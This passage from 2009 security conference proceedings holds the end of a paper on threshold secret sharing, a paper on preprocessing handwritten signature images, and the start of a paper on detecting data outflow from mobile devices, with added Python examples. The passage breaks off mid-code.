The essence of the presented approach is that within a given layer it is possible to divide secret information in such a way that every person involved in the process of encrypting the information becomes the owner of a certain part of the secret. Even though such persons are equal owners of parts of the secret from the perspective of the information splitting process, the secret can be recreated omitting some of them. If the secret is split between the members of a given group in equal parts, this means that every member will receive the same amount of the secret, and then all of them have to reveal their parts to recreate the original message. There is obviously no absolute requirement for all owners of parts of the secret to reveal their parts, because, for example, threshold schemes for information splitting (like Tang's algorithm [16]) guarantee that secret information can be recreated with the involvement of a smaller number of participants than the number between which the shares were distributed. Since every participant of the information splitting and also of the information reconstruction process is treated as an equal process participant, there is no person in the group who could reconstruct the information without involving others. Such a split of information between the members of a given group in which everyone has the same privileges is a layer split. It is worth noting that the layer split may refer to the following types of splits:
• Various secrets split in various layers in the same (similar) way - the secret is split in the same way (in the sense of the method), regardless of the layer dealing with this secret. Obviously, the number of participants of the secret split in the various layers is determined by the instance supervising the split (the decision-maker), and it is unchanged in the remaining layers. What does change is the information constituting the secret being split in the specific layer.
• The same secret split in different ways depending on the layer - if we take information A, which can be a secret for several layers within which it is split, then, for instance, this secret can be split among n participants in the first layer, the same secret can be split in the superior (second) layer between n-k participants, which is a number smaller than in the subordinate layer, and in the third layer the same secret can be split among n-k-p participants. The values n, k, p can be defined freely depending on the size of the group from which the selected persons - the secret trustees - are chosen.
• Various secrets in different layers - this type of split concerns a situation in which different pieces of information can be split between different groups of persons. So for a business organisation this situation may mean that at the decision-making level the secret split comprises specific strategic information of the organisation, but at the executive stage marketing and promotion information of the organisation may be split.
The mentioned layer splits of secrets can apply to splitting information at various levels - the operational, tactical and strategic levels of a given organisation. Of course, the selection of the appropriate splitting method depends on the type of the organisational structure and the importance of the shared information.

Another type of business structure is a hierarchical structure. The essence of the hierarchical approach lies in considering the hierarchy operating within the business organisation. It is the hierarchical nature of business organisations that allows hierarchical secret splits to be introduced. Such a split may have the form of a split of varied information (secrets) within a given hierarchy, taking into consideration that higher up in the hierarchy this secret can be reconstructed by other trustees (or a single other trustee) of parts of the secret. This situation is illustrated in Fig. 2. Hierarchical information splits are much more frequent than layered splits, as the hierarchical nature of the structure is much more commonplace in various types of organisations. This is why a hierarchical information split can be used both in lean and in flat structures, taking into account the superiority of the persons managing the organisation and the subordination of particular departments and their managers. In the case of a hierarchical information split, it is noticeable that secret splits are very varied and the ways of splitting and sharing information are very numerous and depend on the individual situation of the organisation and the materiality of the shared information. This is why the methods of secret splitting presented in this publication, concerning both the hierarchical and the layered split, can be used in various types of organisational structures.

M.R. Ogiela and U. Ogiela
Fig. 2. Hierarchical secret split
4 Conclusion

This publication proposes a new protocol for executing linguistic threshold schemes which use context-free sequential grammars. This protocol allows known threshold schemes to be extended to include an additional stage of coding the shared secret using an appropriately defined grammar. The coding can be applied to single bits of the input representation of the split secret or to blocks consisting of 2, 3 or more bits. For the general scheme of this information split, the authors have also presented its possible applications for the intelligent management and distribution of data in organisational structures of the layered and hierarchical type. Important strategic data can be distributed in institutions with such structures by means of the protocol described here, whereby the data is split and a part of it allocated to persons at the appropriate levels. The proposed method, in addition to its high utility, also introduces certain improvements to previously known techniques of information splitting. Such techniques, even though they are completely secure, require the participation of a trusted instance or an arbiter for the correct division or recreation of the information. The presented protocol is a universal solution suitable for use both as an arbitration protocol and as a protocol requiring no trusted party to participate. In the second case, executing it introduces an additional information component allocated to one of the parties participating in the information splitting procedure.

Acknowledgements. This work has been supported by the AGH University of Science and Technology under Grant No. 10.10.120.783.
References
1. Asmuth, C.A., Bloom, J.: A modular approach to key safeguarding. IEEE Transactions on Information Theory 29, 208–210 (1983)
2. Ateniese, G., Blundo, C., De Santis, A., Stinson, D.R.: Constructions and bounds for visual cryptography. In: Meyer auf der Heide, F., Monien, B. (eds.) ICALP 1996. LNCS, vol. 1099, pp. 416–428. Springer, Heidelberg (1996)
3. Beguin, P., Cresti, A.: General short computational secret sharing schemes. In: Guillou, L.C., Quisquater, J.-J. (eds.) EUROCRYPT 1995. LNCS, vol. 921, pp. 194–208. Springer, Heidelberg (1995)
4. Beimel, A., Chor, B.: Universally ideal secret sharing schemes. IEEE Transactions on Information Theory 40, 786–794 (1994)
5. Blakley, G.R.: Safeguarding Cryptographic Keys. In: Proceedings of the National Computer Conference, pp. 313–317 (1979)
6. Blakley, B., Blakley, G.R., Chan, A.H., Massey, J.: Threshold schemes with disenrollment. In: Brickell, E.F. (ed.) CRYPTO 1992. LNCS, vol. 740, pp. 540–548. Springer, Heidelberg (1993)
7. Blundo, C., De Santis, A.: Lower bounds for robust secret sharing schemes. Inform. Process. Lett. 63, 317–321 (1997)
8. Charnes, C., Pieprzyk, J.: Generalised cumulative arrays and their application to secret sharing schemes. Australian Computer Science Communications 17, 61–65 (1995)
9. Desmedt, Y., Frankel, Y.: Threshold Cryptosystems. In: Brassard, G. (ed.) CRYPTO 1989. LNCS, vol. 435, pp. 307–315. Springer, Heidelberg (1990)
10. van Dijk, M.: On the information rate of perfect secret sharing schemes. Designs, Codes and Cryptography 6, 143–169 (1995)
11. Zhang, N., Zhao, W.: Privacy-preserving data mining systems. Computer 40(4), 52–58 (2007)
12. Jackson, W.-A., Martin, K.M., O'Keefe, C.M.: Ideal secret sharing schemes with multiple secrets. Journal of Cryptology 9, 233–250 (1996)
13. Ogiela, M.R., Ogiela, U.: Linguistic Extension for Secret Sharing (m, n)-threshold Schemes. In: SecTech 2008 - 2008 International Conference on Security Technology, Hainan Island, Sanya, China, December 13-15, pp. 125–128 (2008), ISBN: 978-0-7695-3486-2, doi:10.1109/SecTech.2008.15
14. Shamir, A.: How to Share a Secret. Communications of the ACM 22(11), 612–613 (1979)
15. Simmons, G.J.: An Introduction to Shared Secret and/or Shared Control Schemes and Their Application in Contemporary Cryptology. In: The Science of Information Integrity, pp. 441–497. IEEE Press, Los Alamitos (1992)
16. Tang, S.: Simple Secret Sharing and Threshold RSA Signature Schemes. Journal of Information and Computational Science 1, 259–262 (2004)
Analysis of Handwritten Signature Image

Debnath Bhattacharyya1, Poulami Das1, Samir Kumar Bandyopadhyay2, and Tai-hoon Kim3
1 Computer Science and Engineering Department, Heritage Institute of Technology, Kolkata-700107, India
{debnathb,dasp88}@gmail.com
2 Department of Computer Science and Engineering, University of Calcutta, Kolkata-700009, India
[email protected]
3 Hannam University, Daejeon-306791, Korea
[email protected]
Abstract. Handwritten signature identification has been a classical work area of computer science and technology for the last few years, and various new techniques of image analysis are also attracting computer scientists. Firstly, pixel clustering is used to transform the signature image into a bi-color image. Secondly, instead of considering the whole image, only the signature area is extracted. Thirdly, using an image scaling technique, the signature image is resized along the coordinate directions; the different techniques used to subsample the transformed image are discussed in turn. Fourthly, a thinning technique is used to reduce the thresholded output of an edge detector to lines of a single pixel thickness. In this paper we propose the above series of techniques as the preprocessing part of handwritten signature recognition.
Keywords: Skeletonization, Scaling, ITA (Image Thinning Algorithm), ROI (Region of Interest).
1 Introduction

Handwritten signature recognition is a widely used means of establishing authenticity. Although a signature is easy to copy and the signature of one person varies from one occasion to another, it remains a common and widely accepted authentication technique. There are two approaches to handwritten signature recognition: a) on-line and b) off-line. This research concentrates on the static features of a handwritten signature, which is the off-line approach [7]. Images of the handwritten signature are captured repeatedly, since the signature of a person may vary widely from time to time; these images are treated as a special type of object. From these sample signatures an average is taken and stored for future authentication. At this point the aim is to reduce the chance of rejecting genuine signatures while improving forgery resistance. Incorporating those two aspects - acceptance of the variance and the requirement for exactness of certain features - in one system is a very difficult task and there is still no perfect solution. The technique developed so far is to extract morphological features from the handwritten signature image and to take decisions by analysing that image [6].

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 43–50, 2009. © Springer-Verlag Berlin Heidelberg 2009
D. Bhattacharyya et al.
2 Previous Works

An image can be represented morphologically using dilation and erosion. The fundamental operations associated with an object are the standard set operations union, intersection and complement, plus translation and Boolean convolution [1]. Binary image morphology is considered in terms of the behaviour of binary images: erosion and dilation, the treatment of image foreground and background, blur, the effect of added noise, and translation-invariant methods for pattern matching [2]. Morphological filtering of images is a theory introduced in 1988 in the context of mathematical morphology, built on a lattice framework; the emphasis is on lattices of numerical functions in digital and continuous spaces and on morphological filters [3]. The usefulness of the hit-miss transform (HMT) and related transforms for pattern matching in document image applications has been examined. The HMT is sensitive to the types of noise found in scanned images, including both boundary and random noise, but a simple extension, the blur HMT, is relatively robust; its noise immunity derives from its ability to treat both types of noise together and to remove them by appropriate dilations [4]. In the adaptive saturation-based colour morphology of [5], the adaptation is achieved using a trade-off parameter in the form of a nonlinear function of the local saturation. To evaluate the performance of that algorithm, a designed psychophysical experiment is used to derive a metric denoted as the average value for the psychophysical evaluation in percent (APE%). Results show that an APE of 73 to 96% can be achieved for the basic morphological operators, i.e., dilation, erosion, opening and closing; the APE value depends on the size and shape of the structuring element as well as on the image details. The algorithm has also been extended to other morphological operators, such as image smoothing (noise suppression), top-hat, gradient and Laplacian operators. In the case of a smoothing operation, an average peak signal-to-noise ratio (PSNR) of 31 to 37 dB is achieved for various structuring elements and applied noise variances, while good results are achieved with the proposed top-hat operators [5].

Whenever an image is digitized, i.e., converted from one form to another, some degradation occurs at the output [6]. There is no image processing system which can produce an ideal image. Image enhancement is the improvement of the appearance of the image; it can be done via contrast intensification, smoothing and edge sharpening. Algorithms for both spatial-domain and frequency-domain techniques are widely used: the spatial domain deals with the neighbourhood of a single pixel and the frequency domain with global filters (masks) [6].

Alessandro Zimmer and Lee Luan Ling (2003) proposed a hybrid handwritten signature verification system, where the on-line reference data acquired through a digitizing tablet serves as the basis for the segmentation process of the corresponding scanned off-line data. Local foci of attention over the image were determined through a self-adjustable learning process in order to pinpoint the feature extraction process. Both local and global primitives were processed and the decision about the authenticity of the specimen was defined through similarity measurements. The global performance of the system was measured using two different classifiers [7]. A method for the automatic verification of handwritten signatures was described by Ramanujan S. Kashi, William Turin and Winston L. Nelson in 1996. The method is based on global and local features that summarize aspects of signature shape and the dynamics of signature production. They compared it with their previously proposed method and showed the improvement of the current version [8].
3 Our Work

We propose the following four algorithms to achieve our goal.

3.1 Transform Gray Signature Image to Bi-Color Signature Image
Input: Gray scale signature image.
Output: Bi-color signature image.
a. Open the gray scale signature image in read mode.
b. Read a pixel.
c. Check the pixel intensity value: if the value is less than 255 (the gray value for white), convert it to 0 (black); otherwise leave the pixel value unchanged.
d. Rewrite the pixel with the changed intensity value.
e. If not 'end of file', go to step b.
f. Close the image file.

3.2 Extracting Region of Interest (ROI)
Input: Bi-color signature image (output of algorithm 3.1).
Output: Image containing only the signature region.
a. Open Image1 (the bi-color signature image) in input mode.
b. Open Image2 in output mode.
c. Declare an integer 2D matrix of size [n x m], where n and m are the width and height of Image1.
d. Get the RGB value [i, j] of Image1 and store it at position Matrix[i, j].
e. Go to step d until the end of Image1 is reached; Matrix[n, m] now holds the RGB weights of Image1.
f. Identify the first row in which a black RGB value occurs in Matrix[n, m], i.e., p.
g. Identify the first column in which a black RGB value occurs in Matrix[n, m], i.e., q.
h. Matrix[p, q] is then the starting position of the signature region of Image1.
i. Identify the last row in which a black RGB value occurs in Matrix[n, m], i.e., x.
j. Identify the last column in which a black RGB value occurs in Matrix[n, m], i.e., y.
k. Matrix[x, y] is then the end position of the signature region of Image1.
l. Get the RGB values of the matrix from position [p, q] to [x, y] and write them into Image2.
3.3 Scaling

This step takes the resultant bi-color signature image from algorithm 3.2. The mathematics behind the scaling we used and tested is given below.
a. The input image is loaded via Toolkit and MediaTracker.
b. Four arguments contain the maximum size of the image to be created. The actual size of the new image is computed from that maximum size and the actual size of the input image (all sizes are given in pixels), so that the input image is scaled correctly. If the two arguments for the maximum image size are both 100 and the image that was loaded is 400 by 200 pixels, we want the result to be 100 by 50 pixels, not 100 by 100, because the original image is twice as wide as it is high; a 100 by 100 pixel image would contain a very skewed version of the original.
c. Having determined the size of the new image, we create a BufferedImage of that size, named iImage, obtain a graphics object for it and call its drawImage method to draw the original image onto the new one. The call to drawImage does the actual scaling.
d. Rendering hints select the interpolation. Bilinear interpolation improves the result but slows performance, so it can be omitted where speed is more important; for nicer results (at least in some cases) we have used INTERPOLATION_BICUBIC instead of INTERPOLATION_BILINEAR.
e. In order to save the scaled-down image to a file, we create a buffered FileOutputStream with the second argument as the file name and initialise the necessary codec objects.
f. The quality argument from the command line is converted from the interval 0 to 100 to the interval 0.0f to 1.0f, because that is what the codec expects (we mostly used 0.75f). The higher that quality number, the better the resulting image quality, but also the larger the resulting file.
3.4 Image Thinning Algorithm (ITA)
Input: Resultant signature image from algorithm 3.3.
Output: Thinned signature image.
a. Take the pixels surrounding the foreground.
b. Foreground points must have at least one background neighbour.
c. Reject points that have more than one foreground neighbour.
d. Repeat steps b and c, skipping any pixel whose removal would locally disconnect the region (divide it into two parts), and iterate until convergence, i.e., until no further pixel changes.
Implemented pseudocode:

    BufferedImage bi = ImageIO.read(new File("Signature_Image"));
    int[][] matrix = new int[bi.getWidth()][bi.getHeight()];
    // fill the matrix with the pixel values (loop completed from the declaration above)
    for (int i = 0; i < bi.getWidth(); i++)
        for (int j = 0; j < bi.getHeight(); j++)
            matrix[i][j] = bi.getRGB(i, j);
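The following Python is an added example, not the authors' Java implementation, that runs the four stages of Section 3 in order on a constructed 8 x 12 grayscale sample. Two substitutions are assumptions of this example: scaling is nearest-neighbour rather than the bilinear or bicubic drawImage of 3.3, and thinning is the standard Zhang-Suen algorithm standing in for the paper's ITA, whose rules are only sketched. The sample also carries one faint speck so that the effect of the threshold in 3.1 (255 keeps every non-white pixel, a lower value drops light noise and tightens the ROI) can be seen.

```python
"""Signature image preprocessing: threshold to bi-colour, crop to the
region of interest, scale into a bounding box keeping the aspect ratio,
and thin strokes to single-pixel width.

Added example, not the authors' Java code.  Images are lists of rows of
ints (0 = background/white, 1 = ink) so only the standard library is
needed.  Scaling is nearest-neighbour (assumption) and thinning is the
standard Zhang-Suen algorithm, not the paper's own ITA.
"""

WHITE = 255


def to_bicolor(gray, threshold=WHITE):
    """Algorithm 3.1: any pixel darker than `threshold` becomes ink (1).
    With the page's value 255 every non-white pixel is kept; a lower
    threshold also discards faint scanner noise (Section 4)."""
    return [[1 if v < threshold else 0 for v in row] for row in gray]


def crop_roi(img):
    """Algorithm 3.2: cut the bounding box [p, q]..[x, y] of all ink."""
    rows = [r for r, row in enumerate(img) if any(row)]
    if not rows:
        return []
    cols = [c for c in range(len(img[0])) if any(row[c] for row in img)]
    p, x, q, y = rows[0], rows[-1], cols[0], cols[-1]
    return [row[q:y + 1] for row in img[p:x + 1]]


def scale_to_fit(img, max_w, max_h):
    """Algorithm 3.3: resize into a max_w x max_h box without changing the
    aspect ratio, so 400x200 into 100x100 gives 100x50, not 100x100."""
    h, w = len(img), len(img[0])
    f = min(max_w / w, max_h / h)
    new_w, new_h = max(1, round(w * f)), max(1, round(h * f))
    return [[img[r * h // new_h][c * w // new_w] for c in range(new_w)]
            for r in range(new_h)]


def _neighbours(img, r, c):
    """P2..P9: the 8-neighbourhood clockwise from the pixel above;
    positions outside the image count as background."""
    h, w = len(img), len(img[0])

    def g(y, x):
        return img[y][x] if 0 <= y < h and 0 <= x < w else 0

    return [g(r - 1, c), g(r - 1, c + 1), g(r, c + 1), g(r + 1, c + 1),
            g(r + 1, c), g(r + 1, c - 1), g(r, c - 1), g(r - 1, c - 1)]


def thin(img):
    """Zhang-Suen thinning.  Each pass has two sub-iterations that delete
    boundary pixels which are neither end points (2 <= B <= 6) nor needed
    for connectivity (exactly one 0->1 transition around the pixel); the
    result is a one-pixel-wide skeleton once a pass deletes nothing."""
    img = [row[:] for row in img]
    h, w = len(img), len(img[0])
    changed = True
    while changed:
        changed = False
        for step in (0, 1):
            marked = []
            for r in range(h):
                for c in range(w):
                    if not img[r][c]:
                        continue
                    p = _neighbours(img, r, c)
                    p2, p4, p6, p8 = p[0], p[2], p[4], p[6]
                    b = sum(p)
                    a = sum(1 for i in range(8) if p[i] == 0 and p[(i + 1) % 8] == 1)
                    if step == 0:
                        ok = p2 * p4 * p6 == 0 and p4 * p6 * p8 == 0
                    else:
                        ok = p2 * p4 * p8 == 0 and p2 * p6 * p8 == 0
                    if 2 <= b <= 6 and a == 1 and ok:
                        marked.append((r, c))
            for r, c in marked:       # delete simultaneously, as the method requires
                img[r][c] = 0
            changed = changed or bool(marked)
    return img


def preprocess(gray, box=(150, 70), threshold=WHITE):
    """Run the four stages in the paper's order and return the skeleton."""
    return thin(scale_to_fit(crop_roi(to_bicolor(gray, threshold)), *box))


# Constructed sample: an 8x12 white page with a 3x7 dark bar (ink value 40)
# and one faint speck (value 230) far from it, to show the threshold effect.
SAMPLE = [[255] * 12 for _ in range(8)]
for _r in range(2, 5):
    for _c in range(3, 10):
        SAMPLE[_r][_c] = 40
SAMPLE[6][11] = 230

if __name__ == "__main__":
    for row in preprocess(SAMPLE, box=(7, 3), threshold=200):
        print("".join("#" if v else "." for v in row))
```

A real scan can be brought into the same row-of-ints form with Pillow's `Image.open(path).convert("L")`. On the sample, the page's threshold of 255 pulls the speck into the ROI (5 x 9), while a threshold of 200 yields the bare 3 x 7 bar, which Zhang-Suen reduces to a single-pixel line; note that this algorithm also shortens the stroke ends by a pixel or two, a known side effect worth checking on real signatures.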
4 Result

Extensive testing has been done with a signature database composed of the signatures of 131 users (individuals), each user with 24 handwritten signatures and 10 trained forgeries [Handwriting Databases: http://www.gpds.ulpgc.es/download/]. One such test result is shown here. Fig. 1 shows a user's signature as the original 256-colour image; an ink colour other than black is used. The bi-color clustered image is the output image shown in Fig. 2, which is the output of our "Transform Gray Signature Image to Bi-Color Signature Image" algorithm. A further advantage of this algorithm is that it is very useful for noise reduction, which can be achieved by tuning the threshold value during the conversion to the bi-color image. The resultant image is passed through our "Extracting Region of Interest (ROI)" algorithm; the effect is shown in Fig. 3.
Fig. 1. 256 BMP Image (Gray) [246 x 146], Before Pixel Clustering
Fig. 2. Bi-Color Image [246 x 146], after Pixel Clustering
Fig. 3. Bi-Color Image (ROI) [223 x 73]
Fig. 4. Bi-Color Scaled Image [150 x 70]
Fig. 5. Thinned Signature Image [150 x 70]

Table 1. Time taken for Gray to Bi-color and ROI
Test No.   Image size [n x m]   Millisec.   Sec.
1          246 x 146            234         0.234
2          422 x 229            283         0.283
3          670 x 352            310         0.310

Table 2. Time taken for Scaling and ITA
Test No.   Image size [n x m]   Millisec.   Sec.
1          223 x 73             193         0.193
2          337 x 113            232         0.232
3          535 x 252            281         0.281
The resultant signature image is then passed through our scaling algorithm and the result is shown in Fig. 4. The image is then passed through our ITA algorithm, in which we have used our own technique rather than the widely used masking algorithms (Fig. 5). The algorithms are implemented in JDK 1.6 with Java Advanced Imaging (JAI 1.2.2). The hardware configuration is a Pentium Dual CPU with a 1.8 GHz processor and 1 GB RAM, running Fedora 9 as the operating system. Table 1 shows the times taken by the first two algorithms for different image sizes, and Table 2 shows the times taken by the scaling and ITA algorithms. The programs run in polynomial time. The results in Tables 1 and 2 show that the image size does not greatly affect the time taken to produce the final output.
5 Conclusion

This paper has emphasized various image processing algorithms which form the preprocessing part of signature image analysis required for future authentication and recognition. In this paper we propose four new algorithms. Initially a gray scale signature image is taken, and the final output is extracted by passing it through the four algorithms in turn. The result has been reported in terms of the time consumed. We are also working towards the authentication and recognition of signatures, which will be detailed in future publications.
Acknowledgement

This work was supported by the Security Engineering Research Center, granted by the Korea Ministry of Knowledge Economy. This work was successfully completed with the active support of Prof. Tai-hoon Kim, Hannam University, Republic of Korea.
References
1. Young, T., Gerbrands, J.J., van Vliet, L.J.: Morphology-based Operations, http://www.ph.tn.tudelft.nl/Courses/FIP/noframes/fip-Morpholo.html (last visited on May 16, 2009)
2. Bloomberg, D.S., Vincent, L.: Pattern Matching using the Blur Hit-Miss Transform. Journal of Electronic Imaging 9(2), 140–150 (2000)
3. Serra, J., Vincent, L.: An Overview of Morphological Filtering. Circuits, Systems and Signal Processing 11(1), 47–108 (1992)
4. Bloomberg, D.S., Vincent, L.: Blur Hit-Miss Transform and its Use in Document Image Pattern Detection. In: Proceedings of SPIE, Document Recognition II, San Jose CA, March 30, vol. 2422, pp. 278–292 (1995)
5. Al-Otum, H.M., Uraikat, M.T.: Color image morphology using an adaptive saturation-based technique. Optical Engineering, Journal of SPIE 43(6), 1280–1292 (2004)
6. Dutta Majumder, D., Chanda, B.: Digital Image Processing and Analysis. Prentice-Hall of India Pvt. Ltd., Englewood Cliffs (2006)
7. Zimmer, A., Ling, L.L.: A Hybrid On/Off Line Handwritten Signature Verification System. In: International Conference on Document Analysis and Recognition, Edinburgh, Scotland, August 3-6, vol. 1, pp. 424–428 (2003)
8. Kashi, R.S., Turin, W., Nelson, W.L.: On-line handwritten signature verification using stroke direction coding. Optical Engineering, SPIE Digital Library 35, 2526 (1996)
The Design of Signature Selection for Protecting Illegal Outflow of Sensitive Information in Mobile Device

Bo-heung Chung, Min-ho Han, and Ki-young Kim
Electronics and Telecommunications Research Institute, 138 Gajeongno, Yuseong-gu, Daejeon, Korea
{bhjung, mhhan, kykim}@etri.re.kr
Abstract. Illegal outflow of important data from a mobile device is a sensitive and central issue in mobile security. Within restricted resources such as small memory size and low battery capacity, a simple and efficient method is needed that keeps the effort of preventing this illegal activity low. In this paper, we discuss a protection technique that takes these considerations into account. Some data is extracted from an important file and used to prevent illegal transfer and modification of that file. So that an attacker cannot easily predict where this data is selected from, it is selected from the whole extent of the file with equal distribution. To avoid a large increase in the amount of selected data compared with selection at a specific location, the number of selections is restricted to a minimum, based on an analysis of the length and number of files. To decrease the computational overhead of calculating the number and location of the data to be selected, this information is precomputed in advance. With the help of this technique, illegal outflow from a mobile device can be detected and prohibited effectively, and a mobile device can be managed securely with low overhead.
Keywords: sensitive information protection, illegal outflow prevention, mobile device security.
1 Introduction

Recently, mobile devices have become more popular and are widely used. As the capabilities of these devices increase, they are no longer simple accessories; they provide enough computing power to handle various services together: e-mail, business document processing, banking and entertainment. Due to the rapid evolution of mobile devices, important information of a user (e.g. contact lists, certificates and so on) tends to be kept in the device's internal storage. This data may be leaked by malicious programs such as viruses and worms, or through the carelessness of a user. It is well known how to solve this problem: we must protect sensitive information from unauthorized access or modification, and programs from unauthorized execution. The more important issue is the leakage of this information through external storage devices. For example, if the banking account of a user is leaked without consent, it will be a critical problem in financial and privacy terms. To prevent this, data or file transfers from the mobile device to external storage must be carefully monitored, and all such data should be managed safely within the device. But even with the increase in the capabilities of mobile devices, they are still insufficient to run protection software like a PC's security software.

This paper introduces an approach to prohibiting illegal outflow from internal storage to external storage such as USB mass storage and SD/MD cards. The main idea is that a feature value of the sensitive information - what we call the signature - is extracted by sampling with equal distribution, and is used to cut off illegal file transfers. This value is a byte stream that uniquely distinguishes the file from the other files holding the user's important data. At the moment of file transfer, every block of the data stream is inspected for the signature. To obtain the signature, a sampling method is used that takes into account the number of signatures and the computational overhead of the sampling. Since computing the location and number of signatures requires much computational overhead, the number is determined statically by looking it up in an inference table. In Section 2 we explain other research on protecting or hiding important information. In Section 3 we describe the considerations for selecting the signatures. In Section 4 we show how to obtain a signature taking these considerations into account, such as the length of the signature, the window size and the window number. Finally, Section 5 contains some concluding remarks.

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 51–56, 2009. © Springer-Verlag Berlin Heidelberg 2009
B.-h. Chung, M.-h. Han, and K.-y. Kim
2 Backgrounds

Nowadays, the rapid proliferation of mobile devices and mobile networks has prompted the need to offer security for them [8,9]. Personal digital assistants (PDAs), mobile phones (smart phones), laptops and tablet personal computers (PCs) are classified as mobile devices. Compared with non-mobile devices, they have several special properties, including small memory capacity, battery power, and so on [2,3]. In this environment, these limitations must be considered when developing security functions for mobile devices. There have been studies concerned specifically with security enhancement approaches for mobile devices and with hiding information [9,10,11].

In approaches to protecting against the outflow of a user's information, signature detection is usually used as the inspection method [2,4,5]. There are two types of signature. The first type is a special byte sequence calculated by scanning the whole message, such as a CRC or an MD5 hash value, which is attached to the original message. The other type is a subset byte stream extracted from some part of the whole message, such as the virus signature used by an anti-virus program. To make such a signature, no transformation of the original message is needed. But if the location from which the signature is extracted is predictable, or if an attached signature can simply be substituted, outflow detection can be evaded easily.

As another approach, for example to protect intellectual property from illegal file copying, there has been growing interest in techniques for information hiding. There are two general directions for information hiding: preventing the detection of a message, such as steganography, and hiding a message inside another, such as watermarking and fingerprinting [9,12,13]. But these methods require modification of the original message to hide and embed the secret message in it, and need more computational overhead than the signature method. Because of this, an additional transformation from the converted message back to the original message is needed before it can be used, and given the computational overhead, it is difficult to support within the hardware limitations of a mobile device. As described above, a security function must have low overhead to protect the important information of a mobile device from illegal outflow, and the location of signature extraction should not be predictable.
3 The Strategy of Selection of Signature In this section we explain the concept behind sparse sampling to prevent illegal outflow. Please note that, if your email address is given in your paper, it will also be included in the meta data of the online version. 3.1 Considerations for Signature Selection Before looking more closely at dynamic selection of signature, it is necessary to consider that various parameters to extract and select signature. As described before, the location of signature within whole message must not be predictable and evasion of the signature detection must be restricted from doing various illegal operations on file which has important information. The main considerations are the location for signature selection and the number of selected signature. To avoid simple and easy prediction of signature, the location is determined by random sampling. To protect the signature from these operations, it should be selected in multiple position and number, but the number of the signature must be minimized as possible as small number. And, to extract the signature, the length of it carefully be chosen as appropriate extent to find it easily among files and to detect it in minimum byte comparison. But, the lesser the length of it, the signature’s uniqueness tends to be dwindled down. With the limitation of mobile device, usually small amount of files are located in it and it is apt to hold small size file. Due to small amount and size feature, we can choose the length and the number of signature as minimal as we can. In this case, we select only one signature in random location by predefined length. In a large size file, we must select more signatures than before in random location. To distinguish two cases, specific threshold value is used. Though this value is determined before the signature selection, it is adjusted dynamically according to increase of the iteration of the selection or access frequency for the file. 
When multiple signatures are selected in a file, signature selection based on a binomial distribution is used to counter evasion. This properly precludes the evasion activities of an unauthorized user.

3.2 Considerations for Hardware Limitations

In dynamic signature selection, the burden of computing the number and location of the signatures is an important issue. If this requires too much time and computing power, it is hard to adapt to a mobile device. Multiple signature selection with the binomial distribution method needs highly time-consuming and complex mathematical operations, such as repeatedly calculating roots of real numbers. When a signature is selected from a file using the binomial distribution, the number of signatures is calculated and determined per uniform extent of the file, called a window (of a given window size). The number of such extents is called the window number. The larger the window number, the more dramatically the complexity grows. Therefore, to reduce the computational overhead on a mobile device, the window number must be minimized. Moreover, to decrease the mathematical and time complexity, the calculation overhead for signature selection must grow linearly, not exponentially, with the number. If the window number were predefined and fixed in advance, there would be no need to calculate the number of signatures at every signature selection. But because the window number depends on the file length and the window size, it is difficult to predict before the file is selected for signature extraction. To avoid this unpredictability, in this paper a reference table is used to obtain the number of signatures. The reference table is created in advance for various window numbers and stored in the local storage of the mobile device.
4 The Method of Signature Selection

In this section we show how these considerations are realized. It covers how to decide the length of the signature, the window size and the window number, and also describes the system architecture of the implementation and the procedure of signature detection.

Fixing the length of the signature is a tough task: as the number of files grows, the length must gradually be enlarged to ensure the signature's correctness, so that the correct file can be picked out among the others. In this approach, a coefficient of signature collision is used as the criterion for the length decision. A collision means that an extracted signature is identical to a previously generated one, and the coefficient value grows as collisions become more frequent. Therefore collisions are carefully monitored and their occurrences are accumulated for adjusting the coefficient. Initially the coefficient is set to half the number of files, as an integer value; whenever the number of collisions exceeds the coefficient, it is replaced by half of the previous value. The initial length of the signature is set to a few bytes, depending on the security policy. Each time the coefficient is adjusted, the length is increased by one.

The determination of the window size is influenced by the length of the signature and of the file. The size must be big enough to guarantee the randomness of signature selection: if it is too small, the location can easily be predicted through a few trials of probabilistic estimation. The larger value is set based on statistical experiment. The window number is calculated automatically by dividing the file length by the window size. Because an increase of the window number burdens the mobile device, as described in the previous section, the initial window size is set to the average length of all files in the device. The maximum window number is determined by the security policy. If the window number of some file exceeds the maximum, it is adjusted so as not to exceed it; to do this, the window size is temporarily changed to obtain a proper value below the maximum. There is another case in which the window size changes: when the access frequency or the level of importance of a file is high, the window size is made smaller than in the normal case, or the window size is left unchanged and the number of selected signatures is increased.

Signature selection is performed at file creation time on the mobile device. There are several kinds of file creation: original file creation, copying from an external device, and creation from an internal device. At that time it is determined, according to the security policy, whether to select a signature or not. Our strategies for this decision are keyword-based, special-directory-based, and manual file selection. Keywords must be registered by the device owner or administrator before file creation; they are short text strings describing the important file. The special directory is set up like the keyword-based case: this directory is always monitored carefully for file creation, and all files in it undergo signature selection. The last strategy is that a user selects the file from which to extract signatures. After the signature selection step, the set of signatures is stored in the internal memory of the mobile device. When a file is copied to external storage, the signatures in the set are used to check for their presence in the content of the file. The comparison is done per transferred block; a matched block is prohibited and the copy process is stopped. If a match occurs, the blocks already transferred must be erased.
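As an added example (not the paper's code), the following Python models the selection procedure of Sections 3 and 4 and the block check at copy time: window size from the average file length, the window number capped by a policy maximum, per-window counts taken from a lookup table, random signature locations, and a per-block comparison during transfer. The signature length, the small-file threshold, the maximum window number and the contents of the reference table are assumed values (the paper derives the table from a binomial distribution but does not give it); the carry of the previous block's tail goes slightly beyond the paper, so that a signature straddling a block boundary is still caught.

```python
"""Added example, not the paper's code: a software model of the window-based
signature selection (Sections 3 and 4) and the block check at copy time."""
import random

SIG_LEN = 4        # predefined signature length in bytes (policy value; assumed)
SMALL_FILE = 64    # threshold below which a single signature is taken (assumed)
MAX_WINDOWS = 8    # maximum window number set by security policy (assumed)

# Stand-in for the paper's precomputed reference table (window number ->
# signatures per window). The paper derives it from a binomial distribution
# but does not give its values; these are constructed.
REFERENCE_TABLE = {1: 1, 2: 1, 3: 1, 4: 2, 5: 2, 6: 2, 7: 3, 8: 3}


def window_layout(file_len, avg_len, max_windows=MAX_WINDOWS):
    """Window size starts at the average file length; the window number is the
    file length divided by it. If that exceeds the policy maximum, the window
    size is enlarged (temporarily, for this file) so that it does not."""
    window_size = max(avg_len, SIG_LEN)
    window_number = max(1, file_len // window_size)
    if window_number > max_windows:
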